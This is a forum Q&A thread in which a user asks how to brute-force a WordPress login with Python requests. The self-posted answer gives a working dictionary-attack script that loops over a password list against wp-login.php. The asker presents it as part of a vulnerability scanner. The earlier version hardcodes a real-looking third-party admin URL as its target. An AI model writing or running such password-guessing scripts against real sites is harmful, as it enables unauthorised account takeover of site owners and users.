How to login to wordpress with python with requests?

Question

I've been doing a program called web-map. it scans a website for vulnerabilities. But I'm having some trouble with brute-forcing the wordpress login. This is the code which brute-force the login:

def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False

user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
    password = word.strip('\n')
    intent+=1
    payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
    print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
    s.post(tgt, data=payload)
    data = s.get("http://gerion.info/wp-admin").text
    if 'Escritorio' in data or 'Desktop' in data:
        print '[*] Password found: '+password
        pass_found = True
    else:
        pass

I hope you can help me, Thanks!!

Answer 1

Ok, I found the solution. @payne the problem was I couldn't authenticate to the wordpress admin page. The solution was to let wordpress to set by his own his cookies. This is the final code:

def brute_login(tgt, dictionary):

s = requests.Session()

s.get(tgt)

user = raw_input("User: ")
intent = 0
tgt = tgt + "/wp-login.php"

passwords = []
with open(dictionary, 'r') as f:
    passwords = f.read().rsplit('\n')

for password in passwords:
    intent += 1
    payload = {'log': user,'pwd': password}
    print'[+] Trying with user: %s and password: %s\ttry: %s' % (user, password, intent)

    data = s.post(tgt, data=payload)


    if not 'ERROR' in data.text:
        print '[*] Password found: '+password
        exit(0)